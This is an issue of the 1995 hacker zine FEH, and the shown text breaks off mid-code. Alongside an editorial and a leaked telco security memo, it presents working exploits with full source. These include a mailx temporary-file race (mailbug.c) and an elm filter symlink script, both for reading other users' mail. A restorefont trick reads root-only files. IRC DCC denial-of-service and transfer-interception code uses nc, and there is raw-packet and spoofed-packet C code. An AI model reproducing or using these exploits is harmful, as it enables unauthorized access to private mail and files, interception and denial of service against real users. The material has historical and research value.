/IIIIIIIIII /IIIIIIIII /III /III \ III_____/ \ III____/ \ III \ III \ III \ III \ III \_III \ IIIIIIII \ IIIIIIIII \ IIIIIIIIII \ III___/ \ III____/ \ III__/ III \ III \ III \ III \ III \ III ___ \ IIIIIIIII ___ \ III \ III ___ \__/ /\__\ \/________/ /\__\ \/__/ \/__/ /\__\ \/__/ \/__/ \/__/ ashionably legant ackers Issue #4 December 26th, 1995 Editor: ReDragon Official FEH Distribution Sites: ftp.fc.net /pub/defcon/FEH ftp.2600.com /pub/publications/feh No More Greetz (You already know if yer eleet) FEH #4 The Saga Continues By all accounts, this is our first issue actually delivered on time, and what is easily the best one yet. Previous issues I wondered if there was really a place for FEH, and if I would ever put out another issue. Well, there is no more wondering, the answer is quite clear. Yes. What made it to clear in my mind is that this really IS the best voice of hackers out there. The yardstick by which many zines are judged is phrack. This isn't phrack. And I don't want it to be. Erik Bloodaxe, despite all the best intentions on his part, has run phrack into the ground, and it is time to lay it to rest, and to let the hackers move on. And so, where will you find the hearts of real hackers, what puts a smile on the face of the real hackers, where the pulse of the hacker community lies. It is here, it is FEH. -ReDragon <----------------------------------------------------------------------------> Table of Contents General Stuff: Intro Table of Contents /var/spool/mail/feh Technical Articles: A Guide to CIPSO by Mythrandir Linux 'mail-x' Security Holes by FEH Staff Linux 'restorefont' Security Holes by FEH Staff Linux 'filter' Security Holes by FEH Staff IRC DCC Protocol Security Holes by FEH Staff Example Packet Construction Code by SnoNinja Serious Articles: Breakfast with the Secret Service by Kamakize Some Thoughts on Hacking by Mythrandir Gray Areas: Who's on your side? by FEH Staff Entertaining Articles: #hack Quotes by SnoNinja The Word List by Allen 3. Smith Macs vs. PCs by nicotine Haxoring an ATM Machine by shadow tao Department Store Paging by Tele Monster The Tales of Oof by t3 The Elite Speak Filter by SnoNinja DefCon Reviews and Other Thoughts by Zeed <----------------------------------------------------------------------------> /var/spool/mail/feh To: All XXXXX Bell Employees The Corporate Information Security organization would like to take this opportunity to remind everyone that the Holiday season is when computer hackers usually take opportunities to attempt to `break into' computer systems. During this time, employees take vacations and fewer people are present in buildings to watch computer systems which allow hackers more time to attempt their tricks. We would ask that each employee who is responsible for a computer system (yes, this includes that personal computer on your desktop, as well as those multi-user systems) to take precautions to insure no unauthorized person has the ability to access the computer system and the information on the system. For employees with a personal computer: if possible, turn it off and use the key to lock the system. make certain start-up passwords are active (e.g., LOCKIT, XLOCK). put software and data diskettes in a secure (locked) location. turn off any modem attached to the PC. perform a routine backup. For system administrators with mid-range computers: change the `root' password at the console. insure audit logs are working properly. take a system backup. for those systems with SysGuard installed, insure detective tools are working as expected. upon return from holiday, review the audit logs for unsuccessful login attempts, usage of `root' userid, and any other suspicious activity. For all employees: remember, hackers try to use social engineering to convince you to give them information they shouldn't have. upon return from holiday, check the `last login' message for each system to make certain it is the last time you accessed it. This advisory is not meant to be an answer for every possible security precaution, but a reminder that securing company resources is the responsibility of every employee and should be treated as a part of each person's job. Contact the Computer Security Administration Group at (xxx) xxx-xxxx with questions or for assistance. --- "Nation-wide callerid went into effect on December first. As you are aware, FCC rules calling for nation-wide delivery of calling party number information went into effect. For some unexplained reason, Bell South test calls indicate that long distance carriers are not passing calling party number information. Bell South is in the process of contacting each carrier to ask for explanations and corrective actions. Until we have more information, there seems to be no point in referring the complaining custumers to the carriers. The following verbage should be used to state out position on this matter to complaining coustumers: 'Bell South network is fully compliant with the FCC order and will deliver the calling party number both to and from long distance carriers. We are working with carriers in those instances where the calling party number is not being delivered to identify problems and to ensure full compliance with the FCC order.'" <----------------------------------------------------------------------------> A Guide to the Common Internet Protocol Security Option by Mythrandir (mythrndr@infonexus.com) Some of you may have noticed that not all networks or operating systems respond to the reception of common IP packets anymore. In the struggle to maintain a secure network, recent innovations have been made in the area of trusted systems. Trusted systems can maintain and ensure that access to different classifications of data is properly restricted. One method of maintaining this access control over a network is the common internet protocol security option (CIPSO). CIPSO allows hosts to communicate data in a generic manner so that its security levels and methods of handling can be understood by other machines. Hosts with different internal implementations of a trusted environment can still interact over the network and maintain their levels of security via CIPSO. CIPSO is implemented by creating a new IP option (RFC 791). This option will allow both the kernel and the user (dependant on implementation) to add the option and thus specify the security level of a packet. The basic format of a CIPSO option in an IP packet is as follows: +-------------------------------------------------------------------------+ | OOOOOOOO | LLLLLLLL | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD | TTTTTTTT... | +-------------------------------------------------------------------------+ Option Length Domain of interpretation Tag Information Number 1 Byte 1 Byte 4 Bytes (Long) >= 4 Bytes The option number is a one octet number. This should be 134D. The length field specifies the length in bytes of the entire cipso option. This includes the header information (option, length, doi) as well as the tag information. This number cannot exceed 40 due to ip header length restrictions. The domain of interpretation is a 4 octet number. This number specifies which type of security interpretation should be used. A host will check if it understands this number before it accepts a packet. +-------------------------------------------------------------------------+ | tttttttt | llllllll | iiiiiiiiiiiiiiiiiiii.... | +-------------------------------------------------------------------------+ Tag Type Length Tag fields 1 octet 1 octet variable Tag type is a one octet number which specifies the format of the tag. The numbers 1 - 127 are reserved for standard tag definitions. 128-255 can be assigned by a DOI authority. This is simply a local network definition. Length is a one octet number which specifies the length of the tag. This includes the tag type, length field, and the tag fields. This number cannot exceed 34, again for reasons due to the ip header length restriction of 60 bytes. A standard tag type. (very common) Tag Type 1 +-------------------------------------------------------------------------+ | AAAAAAAA | SSSSSSSS | BBBBBBBBBBBBBBBBBBBBB....... | +-------------------------------------------------------------------------+ Alignment Sensitivity Bit map of categories 1 octet 1 octet variable The alignment field is a 1 octet number. It is always set to zero. Its purpose is to simply align the bit map along an even boundary. The sensitivity field is a 1 octet number which specifies the sensitivity level of the data. This could represent classified, secret, top secret, etc.. The bit map is a variable length field which can be from 0 to 30 bytes long. This is used to contain more specific sensitivity information on a segment of data. This is implementation specific. The packet level implementation is very straightforward, and can be used in a wide variety of ways to control the data contained in the packets. The first is to only allow certain levels of sensitivity to pass through specific interfaces. In other words, you can configure it to handle multiple interfaces and pass top secret data through one interface and unclassified data through a different network interface. Or you could make a card allow unclassified data through, and reject passing of any classified data into an unclassified network. This allows filtering based on the sensitivity of data. The important point to note here is that filtering takes place at the kernel level, NOT the user level. Also, CIPSO can be used so that when a host passes a piece of data across the network, the other host will assign the correct level of security to a data stream. The host can then assure that only authorized users can access the data that they are cleared for. And now that you've found it, what do you do? Well first off you should sit back and watch the network. Try and determine which machines allow what types of sensitivities. This is important so you will know what types you can send to specific machines. It is also important to note the tags that are sent with the classifictions so that they are placed within the packets. In order to get at sensitive data you will probably have to gain access to send raw packets to the local network. At this point you will have to generate raw ip packets which contain the CIPSO option in the header. This could be incorporated in a telnet client. This will allow you to connect to the other machines on the network assuming that you use the correct classification and tag fields. Now for the Code... The first program will allow you to create a ECHO REQUEST ICMP packet with a CIPSO option inside of it. This code is meant to be a base to write something more interesting with. There are two files, cipso.h and cipso_ping.c just type gcc -o cping cipso_ping.c and run as root and then you are set. This code was written on a linux box, but should be fairly portable to other machines. Also, if you want to spoof your source address then you will have to use the IP_HDRINCL socket option, which requires you to patch the raw.c file if you are using a linux kernel. Finally, for your listening pleasure, I've left a little snipet of code that will listen for ICMP packets. It will simply print out the hex data of any ICMP packets it receives. gcc -o ilisten icmp_listen.c and go.. This is also a great piece of code to use as a base for something more interesting.. Best of Luck! Mythrandir Ways to Improve this Code: Fix ilisten so the complete packet information is printed out. Print out the entire ip header the ip option the icmp header and the data all in a nice neat form. Be Elite! Use your Own Code! --------- cipso.h ------ cut here ------ /* * CIPSO structures * By, Mythrandir */ struct cipso_opt { u_char option_num; /* Option number - should be 134 */ u_char length; /* length - cannot exceed 40 */ u_long doi; /* Domain of Interpretation - 4 bytes, a u_long */ u_char tag_data[1]; /* Tag data pointer */ }; struct cipso_tag_type1 { u_char type; /* Will be set to 1 */ u_char length; /* length - cannot exceed 34 */ u_char alignment; /* Alignment octet - always 0 */ u_char sensitivity; /* sensitivity label */ u_char bitmap[1]; /* tag fields */ }; ------ end of cipso.h ----- cut here ------ ------ cipso_ping.c ------ cut here ------- /* * CIPSO Ping * This program demonstrates a simple method of creating a * cipso echo request packet. This is meant to a base to write * other far more useful programs such as a cipso telnet client * or whatnot. * Remember, you may need to modify the sensitivity and the * bit map in order to get it to work correctly with a machine. * 1995 - Mythrandir */ #include #include #include #include #include #include #include #include #include #include #include "cipso.h" #define DATA "FEH Greetz your system." #define DATA_SIZE sizeof(DATA) #define LOCAL_HOST "127.0.0.1" #define DOI 0x12345678 #define TAGBITMAP "123456789012345678901234567890" #define BITMAPSIZE 30 #define SENSITIVITY 1 /* * Data alignment numbers */ #define IP_START 0 #define CIPSO_START 20 #define ICMP_START 64 #define DATA_START 72 #define MAXHOSTNAMELEN 64 #define MAXPACKET 4096 struct sockaddr_in whereto; in_cksum(unsigned short * addr, int len) { register int nleft = len; register unsigned short *w = addr; register unsigned short answer ; unsigned short odd_byte = 0; register int sum = 0; while(nleft > 1) { sum += *w++; nleft -= 2; } if(nleft == 1) { *(unsigned char *)(&odd_byte) = *(unsigned char *) w; sum += odd_byte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return answer; } main(int argc, char *argv[]) { char **av = argv; unsigned char packet[MAXPACKET]; int options; int ntransmitted = 0; int ident = getpid() &0xFFFF; int sock; struct sockaddr_in *to = (struct sockaddr_in *) &whereto; struct sockaddr_in from; struct hostent *hp, *gethostbyname(); char *hostname; char hnamebuf[MAXHOSTNAMELEN]; /* variables for doing a ping packet */ unsigned char outpack[MAXPACKET]; struct iphdr *ip = (struct iphdr *) &outpack[IP_START]; struct cipso_opt *cipso = (struct cipso_opt *) &outpack[CIPSO_START]; struct cipso_tag_type1 *tag1 = (struct cipso_tag_type1 *) cipso->tag_data; struct icmphdr *icp = (struct icmphdr *) &outpack[ICMP_START]; int i; unsigned char *datap = &outpack[DATA_START]; /* * force user to enter host */ if(argc < 2) { printf("%s: \n", argv[0]); exit(1); } /* * Initialize everything */ bzero( (char*) &whereto, sizeof(struct sockaddr) ); to->sin_family = AF_INET; to->sin_addr.s_addr = htonl(inet_addr(av[1])); if(to->sin_addr.s_addr != -1) { strcpy(hnamebuf, av[1]); hostname = hnamebuf; } else { hp = gethostbyname(av[1]); if(hp) { to->sin_family = hp->h_addrtype; bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length); hostname = hp->h_name; } else { fprintf(stderr, "%s: unknown host %s\n", argv[0], av[0]); exit(1); } } /* * Open a Socket */ sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if(sock < 0) { printf("Error: Cannot Open RAW IP socket\n"); exit(1); } printf("Opened RAW Socket\n"); /* * Set up IP Header */ ip->ihl = 15; /* set to 15 to include option in header */ ip->version = 4; ip->tos = 0; ip->tot_len = DATA_START + DATA_SIZE; ip->id = 0; ip->frag_off = 0; ip->ttl = 255; ip->protocol = 1; /* ICMP Protocol */ ip->check = 0; ip->saddr = inet_addr(LOCAL_HOST); /* Thanks to linux this means nothing. YET */ ip->daddr = inet_addr(av[1]); /* * Set up Cipso Header */ cipso->option_num = 134; cipso->length = 40; cipso->doi = DOI; /* * Set up cipso tag data */ tag1->type = 1; tag1->length = 34; tag1->alignment = 0; tag1->sensitivity = SENSITIVITY; strncpy(tag1->bitmap, TAGBITMAP, BITMAPSIZE); /* * Set up ICMP Header */ icp->type = 8; icp->code = 0; icp->checksum = 0; icp->un.echo.sequence = ntransmitted++; icp->un.echo.id = ident; /* * Compute ICMP checksum */ icp->checksum = in_cksum(icp, 8 + DATA_SIZE); /* * Compute IP checksum ip->check = in_cksum(ip, DATA_START + DATA_SIZE); /* * sendto(s, msg, len, flags, to, tolen) */ i = sendto(sock, outpack, DATA_START + DATA_SIZE, 0, &whereto, sizeof(struct sockaddr)); close(sock); exit(0); } --------- end of cipso_ping.c ------- cut here ------- ------- icmp_listen.c ------- cut here ------- /* * Ping watch - A very very rough ICMP packet watcher * Simply displays hex values of packet * by, Mythrandir */ #include #include #include #include main() { int l, i, j; int sock, length; struct sockaddr_in name; char buf[1024]; sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); if (sock < 0) { printf("Cannot open Raw ICMP Socket.\n"); exit(1); } name.sin_family = AF_INET; name.sin_addr.s_addr = INADDR_ANY; name.sin_port = 0; if (bind(sock, (struct sockaddr *) &name, sizeof name ) < 0) { printf("Error binding ICMP socket"); exit(1); } length = sizeof(name); if (getsockname(sock, (struct sockaddr *) &name, &length) < 0) { printf("Error: Can't get socket name\n"); exit(1); } printf("Socket port #%d\n", ntohs(name.sin_port)); for( ; ; ) { if ((l = read(sock, buf, 1024)) < 0) printf("Error receiving ICMP packet\n"); /* * Print out IP information */ printf("Got ICMP Packet From: %d.%d.%d.%d\n", buf[12] & 0xff, buf[13] & 0xff, buf[14] & 0xff, buf[15] & 0xff); printf("Got ICMP Packet To: %d.%d.%d.%d\n", buf[16] & 0xff, buf[17] & 0xff, buf[18] & 0xff, buf[19] & 0xff); /* * Print IP Data */ for(i = 0; i < (l - 4); i += 16) { for(j = 0; j < 16; j++) if((buf[i + j] & 0xff) < 16) printf("0%x ", buf[i + j] & 0xff); else printf("%x ", buf[i + j] & 0xff); printf(" "); for(j = 0; j < 16; j++) if((buf[i + j] < 33) || (buf[i + j] > 126)) printf("."); else printf("%c", buf[i + j]); printf("\n"); } fflush(stdout); } close(sock); exit(0); } ---------- end of icmp_listen.c ------- cut here -------- <----------------------------------------------------------------------------> Linux 'mailx' Security Holes by FEH Staff There is a problem prevalent in the way many programs implement their usage of mktemp() in order to create temporary files in /tmp, allowing users on a machine to read and write to the contents of temporary files created. The basic problem is that there is a race condition that exists between the point that a program calls mktemp(), and the pathname returned by mktemp is actually created. For some programs, the file creation is immediately or almost immediately following the mktemp(), resulting in an extremely small window of opportunity, and as a result making it very difficult to exploit. However, there are other programs that do not immediately open the file, and in these cases it is only a matter of getting the timing right in order to exploit the hole. To exploit this hole, simply create the file that mktemp() returns as a valid temporary filename after mktemp() has been called, but before the file has been opened, allowing the user running the program permissions to read and write from that temporary file. The program will then succeed in an fopen, and will write to the file, oblivious to the fact that it didn't actually create the file, and that others can also read and write from the file. Note that most programs will immediately unlink() a temporary file, but that does not delete it until after it is closed. Closing a file results in the contents of it being flushed, and so by using a 'tail -f' or a similar procedure, you can capture the contents of the file before it is removed from the filesystem. The filename returned by mktemp() is easily determined for most unix platforms, allowing this bug to be exploited. For the linux libc, this is to replace the X's in the template with the leftmost digit starting at 'a', and then being incremented 'a'-'z', 'A'-'Z', and '0'-'9' (if that file already exists), and then replacing the rest of the X's with the process id (0 padded). Other operating systems use a variation of this technique, experimentation easily reveals the algorithm. The generic procedure used to formulate an exploit for a particular program with this bug is as follows: 1. detect the execution of the program. 2. determine the temporary filename that mktemp() will return when called by the program. 3. determine the point at which mktemp() is called by the program, and immediately following that point, create the file, with rw permissions for the user who is running the program. 4. read the contents of the temporary file, using a 'tail -f' or your own routines. 5. if the sticky bet is set on /tmp, clean up your mess by rm'ing the temp file you created, since the unlink() called by the actual program will fail if you are the owner. Linux's /bin/mail, as included in Slackware 3.0 (mailx 5.5), suffers from this mktemp() problem in all temporary files it creates. It uses 5 temporary files with filenames generated during the program's initialization in a tinit() function, and then uses them as it becomes necessary during the program's execution. The race condition begins in this tinit() function. The temporary files that can be exploited are as follows: /tmp/ReXXXXXX Used when a user selects 'e' from the mailx command prompt, to edit mail. The message the user has selected to edit is copied to the temporary file at this point, and then the editor is invoked on that temp file. The race condition ends when the user has selected 'e', and allows the mesage being edited to be read. /tmp/RsXXXXXX Used when a user sends mail, usually from the command line, such as: 'mail dave'. The race condition ends when EOF is recieved from stdin, and the message is about to be sent, and allows the outgoing mail to be read. /tmp/RqXXXXXX Used when mail arrives into the mail spool while mail is currently running. The race condition ends when the program is preparing to shutdown, and allows the new contents of the mail spool to be read. /tmp/RmXXXXXX Used to prepend a message to the user's mbox file. Prepending requires the entire mbox contents to be read to the temporary file and then appened to the new message(s) being added to the file. This is disabled by default in Slackware 3.0 in the /etc/mail.rc by the use of the set append option. For this to be useful, that option needs to be removed from /etc/mail.rc, or an unset append needs to be added to the user executing mail's .mailrc file. The race condition ends when the program is preparing to shutdown /tmp/RxXXXXXX Used to read messages from the user's mail spool. The race condition ends during the program's startup, when the mail spool is read, and allows any new mail in the user's spool to be read. Because there is no user input between tinit() and this point, it is the only race condition that isn't completely trivial to exploit. The exploit that follows demonstrates the flaws in all but the final temporary file. To use, wait for a mail process to execute, then call the mailbug program with the process id as an argument, and finally execute a tail -f /tmp/R*, and let it run until the mail program has terminated execution. As an aside, there are a number of programs that are vulnerable to a directed denial of service attack preventing people from using them by creation of the 62 temporary files that are attempted to be used by mktemp(), resulting in the failure of the program to run. By continous running of a program watching for these vulnerable programs to start, they can be prevented from ever successfully executing (one such example of this is in.pop3d, which would allow a denial of service attack against a specific user from recieving mail through pop). Program: mailx-5.5 (/bin/mail) Affected Operating Systems: linux - Slackware 3.0, others with mailx-5.5 Requirements: account on system, user using /bin/mail Temporary Patch: chmod o-x /usr/bin/Mail (ie: use something else) Security Compromise: any user with an account can read incoming, edited, or outgoing mail if the mail is processed by mailx. Synopsis: The predictability of mktemp() is exploited to create the temporary files after the filenames have been determined but before they are actually created, allowing the mail being dumped to those temporary files to be read by the creator of the files. mailbug.c: /* This program creates temporary files used by mailx (/bin/mail under Slackware 3.0), which can then be read by the program. This will exploit 4 of the 5 temporary files, the final temporary file is a tighter race condition, and is not handled by this code. Following execution of this program with the process id of mail that is running, execute 'tail -f /tmp/R*', redirecting to a file if desired, and allow it to run until the mail process has exited. This can be easily handled in a shell script, but is not included since it is not needed to sufficiently demonstrate the security flaw. */ #include #include #include #include void exploit_mktemp(char *dest, char *prepend, char *pid) { int i; strcpy(dest,prepend); for(i=strlen(pid);i<6;i++) strcat(dest,"0"); strcat(dest,pid); dest[strlen(prepend)] = 'a'; } main(int argc, char **argv) { char tmpf[5][80]; /* hold filename */ umask(0); if(argc<2) { printf("mailbug racer\nSyntax: %s process-id\n",argv[0]); return -1; } /* get mktemp filenames */ exploit_mktemp(tmpf[0],"/tmp/Re",argv[1]); exploit_mktemp(tmpf[1],"/tmp/Rs",argv[1]); exploit_mktemp(tmpf[2],"/tmp/Rq",argv[1]); exploit_mktemp(tmpf[3],"/tmp/Rm",argv[1]); /* create temporary files */ creat(tmpf[0],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); creat(tmpf[1],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); creat(tmpf[2],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); creat(tmpf[3],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); } <----------------------------------------------------------------------------> Linux 'restorefont' Security Holes by FEH Staff Linux's svgalib utilities, required to be suid root, have a problem in that they do not revoke suid permissions before reading a file. This is exploited in the restorefont utility, but similar bugs exist in other svgalib utilities. The restorefont utility serves two functions. First, it will read a font from a file and write it to the console as the font. Second, it will read a font from the console and write it out to a file. Luckily, the specific bug in restorefont can only be exploited if someone is at the console, reducing its overall impact on the security of the system as a whole. In writing the utilities, the authors are cognizant of the fact that when writing out the font, suid permissions must first be given up; it is in fact commented as such in the code. However, when reading in a font, the program is still running with full suid root permissions. This allows us to read in any file for the font that root could access (basically, anything). The applicable code to read in the file is shown below: #define FONT_SIZE 8192 unsigned char font[FONT_SIZE]; if (argv[1][1] == 'r') { FILE *f; f = fopen(argv[2], "rb"); if (f == NULL) { error: perror("restorefont"); exit(1); } if(1!=fread(font, FONT_SIZE, 1, f)) { if(errno) goto error; puts("restorefont: input file corrupted."); exit(1); } fclose(f); We can see from this that the file to be read in has to be at least 8k, as if it is not, the program will produce an error and exit. If the file is at least 8k, the first 8k are read into the buffer, and the program proceeds to set whatever the contents of the file are to the font: vga_disabledriverreport(); vga_setchipset(VGA); /* avoid SVGA detection */ vga_init(); vga_setmode(G640x350x16); vga_puttextfont(font); vga_setmode(TEXT); At this point, the console will now look quite unreadable if you are reading something other than a font from that file. But, the data that is put into the font is left untouched and is readable using the -w option of restorefont. We then read the font back from video memory to a new file, and our job is complete, we have read the first 8k of a file we shouldn't have had access to. To prevent detection of having run this, we probably shouldn't leave an unreadable font on the screen, so we save and then restore the original font before reading from the file. The complete exploit is shown below: Program: restorefont, a svgalib utility Affected Operating Systems: linux Requirements: logged in at console Security Compromise: user can read first 8k of any file of at least 8k in size on local filesystems Synopsis: restorefont reads a font file while suid root, writing it to video memory as the current vga font; anyone at console can read the current font to a file, allowing you to use video memory as an 8k file buffer. rfbug.sh: #!/bin/sh restorefont -w /tmp/deffont.tmp restorefont -r $1 restorefont -w $2 restorefont -r /tmp/deffont.tmp rm -f /tmp/deffont.tmp <----------------------------------------------------------------------------> Linux 'filter' Security Holes by FEH Staff The elm filter under linux runs sugrp mail, thus allowing it to freely read and write from users mail spools. It is only through the integrity of its code that the security of linux's mail system is protected; and in this respect it falls short. In FEH #2, we printed mail-clobber, code that exploited filter in order to destroy a user's mail spool. But, the capabilities to exploit filter extend beyond destruction of a mail spool, you can also use it to read a mail spool. The specific problem that is exploited in this hole is the way filter uses a temporary file to store the input to it, and then subsequently send it back out according to the filter. Because of the modularity of the coding, in the main filter.c, the temporary file is opened, and then written to; after which it is closed. The mailmessage function is then called, with the purpose of forwarding that mail, written to the temporary file, to whatever destination is specified in the filter. At the start of this process, the temporary file is opened, and the contents of it are dumped to the mail spool of the user the mail is being forwarded to. At any point after the file has been initially opened by the main filter function, since the user running filter has permissions on that temp file, it can be rm'd. The temp file existing can then be replaced with a symbolic link to any file that group mail has read permissions on. When it is opened in the mailmessage function, the symbolic link is followed and whatever file that was pointed to will be read in, and the contents forwarded to the user specified in the mail spool. The complete exploit is shown below: Program: filter, an elm utility Affected Operating Systems: linux Requirements: account on machine Security Compromise: user can read any mail spool readable by grp mail. (usually everything, sometimes not root) Synopsis: filter writes out the mail to be forwarded to a temporary file, which is then closed and reopened; if when the temporary file is reopened it is a symlink to a mail spool, filter will proceed to forward the contents of that file as if it was the original message. fread.sh: #!/bin/sh echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp echo From: ReDragon > /tmp/fread-msg.tmp echo To: $LOGNAME >> /tmp/fread-msg.tmp echo Subject: Filter Exploit >> /tmp/fread-msg.tmp echo sleep 2 > /tmp/fread-sh.tmp echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp chmod +x /tmp/fread-sh.tmp /tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp & FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'` rm -f /tmp/filter.$FREAD ln -s /var/spool/mail/$1 /tmp/filter.$FREAD sleep 2 rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD FREAD= <----------------------------------------------------------------------------> IRC DCC Protocol Security Holes by FEH Staff DCC is the IRC client-side protocol used to send information directly between clients. Normally, when a message is sent between 2 users, it goes from the user's client to the irc server that client is connected to, then to the server the reciever is connected to, and finally to the user. Obviously that is a lot of wasted bandwidth compared to sending information directly between two clients, thus DCC is used. DCC is among the simplest of setups for communication, consisting merely of a tcp connection between two computers, across which data is passed. Since error correction, flow control, etc. are already handled by the tcp protocol, there is no need to worry about any such issues. When you initiate a dcc send, a number of things happen: 1. Your irc client opens an unpriviledged tcp port (>1024), and listens for an incoming connection. 2. Your irc client sends: A) The file name B) Your ip address C) The number of the tcp port it is listening on D) The size of the file you are sending (in bytes) 3. The remote irc client then opens a tcp connection to the specified ip address, transmits a bit of garbage to initiate the transfer, and dumps whatever is sent over that tcp port to a file. 4. At the time the first connection to the tcp port is established, your irc client stops listening for new connections, and dumps the file over the now-established tcp connection. What you can do with this: The simplest uses of this setup are denial-of-service attacks. Some IRC clients (ircII earlier than 2.8.2 and Homer) hang while trying to establish a dcc connection. Thus, by placing the ip address of a nonexistant machine in your dcc send request, you can cause the irc client of a user who chose to get the file to hang long enough to cause a ping timeout. (Note for readability, the actual control characters in this script have been replaced with ascii representations, to actually execute convert accordingly). dcckill.irc: echo Loading DCC KILL echo Syntax: DCCK nick filename size echo ^Bfilename^B and ^Bsize^B are bogus values. alias DCCK { ^assign dcc_killing 0 //quote PRIVMSG $0 :^ADCC SEND $1 12341234 4321 $2^A echo *** Sent DCC KILL request to $0 ^assign dcc_killing 1 } --- cut here --- A similar trick, less damaging, but quite capable of confusing the hell out of a lot of people is to direct remote irc clients to connect to the chargen port of some machine on a T3. (Note that ircII will not connect to a priviliged port, although all of the GUI clients I have tested will) You can thus use somebody else's bandwidth to dump garbage to a remote machine. dccchargen.irc: echo Loading DCC CHARGEN echo Syntax: DCCCHARGEN nick filename size echo ^Bfilename^B and ^Bsize^B are bogus values. alias DCCCHARGEN { ^assign dcc_charging 0 //quote PRIVMSG $0 :^ADCC SEND $1 2230084270 19 $2^A echo *** Sent DCC CHARGEN request to $0 ^assign dcc_charging 1 } Aside from denial of service attacks, the primary interesting thing you can do is intercept dcc file transfers. Becuase ircII listens for incoming connections from ANY machine when you do a dcc send, all that is needed is to open a tcp connection to the appropriate port (using netcat for example), dump a few garbage characters to initiate the transfer, and then store whatever comes across the tcp connection in a file. You lose the filename, but for those who are willing to take a hex editor to the first few bytes of what they get, figuring out what the file format is should be no problem. The simplest way to determine which port a dcc transfer is going to be on is if you have user access on the machine. If you watch for new listens on ephemeral ports (using netstat or equivalent), you can then quickly open them, before the actual recipient has a chance to do so. Here is a quick linux-only program to parse the output of netstat -a, and dump the contents of whatever dcc sends start from the local machine to a file. dccgrab.c: /* dccgrab 0.01 */ /* A quick program to intercept dcc sends. */ /* Obviously, don't use this without appropriate permission. */ /* Requires that a copy of netcat be in the path, and a copy of */ /* netcat's telnet.d file needs to be in the current directoyr */ /* output will be written to snagfile */ /* known bugs: bot detection should be improved */ /* Only works with linux netstat */ #include #include #define TRUE 1 #define FALSE 0 int main (){ int SnaggedOne; FILE *f; char NetstatLine [1024]; char CommandString [1024]; char *colin = ":"; char *tempstr; int port; int i; port=1; SnaggedOne=FALSE; while (!SnaggedOne){ system ("netstat -a |egrep LISTEN |egrep ':' >/tmp/.dcc2345"); f=fopen ("/tmp/.dcc2345","rt"); if (f==NULL) { fprintf (stderr,"Unable to open file!"); exit (1); } port =0; while (port == 0) { fgets (&NetstatLine[0],1024,f); tempstr = strstr (&NetstatLine[0],colin); tempstr += sizeof (char); sscanf (tempstr,"%d ",&port); /* let's deal with ports we don't want to touch */ if (port < 1024) /* priviledged */ port=0; if (port == 6000) /* X */ port=0; if (port == 8080) /* proxy servers */ port=0; /* bots... */ if (port == 2222) port=0; if (port == 3333) port=0; if (port == 4444) port=0; if (port == 5555) port=0; if (port == 6666) port=0; if (port == 7777) port=0; if (port == 8888) port=0; if (port == 9999) port=0; if (feof (f)) port=-1; } fclose (f); if (port >0) { SnaggedOne=TRUE; printf ("snagging something from port %d\n",port); sprintf (&CommandString[0],"nc 127.0.0.1 %d < ./telnet.d > snagfile",port); system (CommandString); } else sleep (1); } /* while !snaggedone*/ return 0; } This is obviously not the optimal solution for stealing dcc transfers, and only works locally, but it provides a good basis for working on your own code to improve upon. If you can determine which port the kernel on a remote system assigned last, you stand a good chance at guessing the port number for the next dcc send, simply becuase most kernels assign tcp ports in increasing order. Thus, if you can get a bot to dcc chat you, and you record the port number, and then bombard the next 30 or so tcp ports with attempted connections, you stand a very good chance at getting the next file that that bot happens to send somebody. Actual implementation of this is left as an exercise to our readers. Good Luck! <----------------------------------------------------------------------------> Example Packet Construction Code by SnoCrash /* Send a "Christmas Tree Packet" (SYN, URG, PSH, FIN and 1 Byte of data) */ /* from source.port to dest.port. This type of packet is also known as a */ /* "Kamikaze Packet", "Nastygram", and "lamp test segment". */ pktsend.h: /* Prototypes. */ int sendpkt_tcp(struct sockaddr_in *, unsigned short int, char *, unsigned short int, unsigned long int, unsigned long int, unsigned short int, unsigned short int, unsigned char, unsigned long int, unsigned long int); int sendpkt_udp(struct sockaddr_in *, unsigned short int, char *, unsigned short int, unsigned long int, unsigned long int, unsigned short int, unsigned short int); /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Send faked TCP packet. */ int sendpkt_tcp(sin, s, data, datalen, saddr, daddr, sport, dport, flags, seq, ack) struct sockaddr_in *sin; unsigned short int sport, dport, s, datalen; unsigned long int daddr, saddr, seq, ack; unsigned char flags; char *data; { struct iphdr ip; struct tcphdr tcp; static char packet[8192]; unsigned short int len=0; char tcpbuf[8192]; char *p; /* Fill in IP Header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(40 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_TCP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in TCP Header values. */ tcp.th_sport = htons(sport); tcp.th_dport = 